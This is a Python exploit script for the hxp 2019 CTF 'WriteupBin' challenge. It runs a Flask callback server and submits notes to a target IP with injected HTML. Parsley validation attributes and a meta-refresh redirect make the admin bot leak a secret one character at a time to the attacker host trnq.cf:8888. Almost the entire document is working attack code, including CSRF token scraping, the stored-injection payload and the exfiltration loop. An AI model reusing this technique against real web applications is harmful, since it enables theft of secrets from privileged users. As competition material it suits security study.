Payload for the WriteupBin challenge (hxp2019 CTF)
from flask import Flask
import time
import requests
import os
import re
import sys
# Flask app that receives the callback hits triggered by the injected note.
app = Flask(__name__)

# One shared HTTP session so the target's cookies persist across requests.
sess = requests.Session()

# Target base URL (note the trailing '/').
URL = 'http://78.46.216.67:8001/'
# Anti-CSRF token scraped from the target's front page; filled in by login().
CSRF = ''
# Candidate characters tried for the next position of the value being recovered (lowercase hex).
alph = 'abcdef0123456789'
# Characters of the value recovered so far; get_code() overwrites it with each callback.
prefix = '1800a1'

# Note body submitted to the target; gen_payload() substitutes the {flag} placeholder.
# Defender's note: this HTML is sent verbatim as the note 'content', so the target
# appears to store and render attacker-controlled markup — output encoding or a
# sanitizer on stored notes would be the mitigation (inferred from usage, not verified here).
payload = '''
<form data-parsley-validate>
<input id=x value=11111>
<input data-parsley-error-message='<meta http-equiv=refresh content="0;http://trnq.cf:8888/c/{flag}">' data-parsley-trigger="blur" value="11111" data-parsley-equalto='a[href^="/show.php?id={flag}"],#x' autofocus>
</form>
<base href='/a' target='terjanq'></base>
'''
def report():
    """Stub kept in place; nothing in this file calls it and it simply returns None."""
    return None
def login():
    """Fetch the target's front page and store its anti-CSRF token in the global CSRF.

    Raises AttributeError (via ``None.group``) if the hidden ``c`` field is not found.
    """
    global CSRF
    front_page = sess.get(URL).text
    token_re = r'<input type="hidden" name="c" value="([a-f0-9]+)">'
    CSRF = re.search(token_re, front_page).group(1)
def gen_payload(word):
    """Return the note body template with *word* substituted for its ``{flag}`` placeholder."""
    return payload.format_map({'flag': word})
def send_payload(word):
    """Submit one note per candidate character appended to *word* and report each to admin.php.

    The global *prefix* is re-read on every iteration (get_code() rewrites it from a
    callback), and the loop stops as soon as *prefix* has become longer than *word*,
    i.e. once a callback has overtaken this call. Each iteration sleeps one second.

    Raises KeyError if the add.php response carries no Location header, and
    AttributeError if that header does not contain a ``/show.php?id=`` value.
    """
    for candidate in alph:
        # Do not cache len(prefix): another request may have updated it meanwhile.
        if len(word) < len(prefix):
            break
        guess = word + candidate
        print("Sent %s" % guess)
        add_resp = sess.post(
            URL + 'add.php',
            data={'c': CSRF, 'content': gen_payload(guess)},
            allow_redirects=False,  # keep the redirect response so its Location header is readable
        )
        note_id = re.search(r"/show.php\?id=([a-f0-9]+)", add_resp.headers['Location']).group(1)
        sess.post(URL + '/admin.php', data={'c': CSRF, 'id': note_id})
        time.sleep(1)
@app.route('/c/<word>')
def get_code(word):
    """Callback endpoint: adopt *word* as the new known prefix and keep guessing from it.

    Returns the plain string "ok" as the HTTP body.
    """
    global prefix
    prefix = word
    print(word)
    send_payload(word)
    return "ok"
@app.route('/start')
def start():
    """Manual trigger: begin guessing from whatever the global *prefix* currently holds."""
    send_payload(prefix)
    return "ok"
def _main():
    """Obtain the anti-CSRF token once, then serve the callback routes."""
    login()
    # Binds on every interface; the payload's callback URL targets port 8888.
    app.run(host="0.0.0.0", port=8888)


if __name__ == '__main__':
    _main()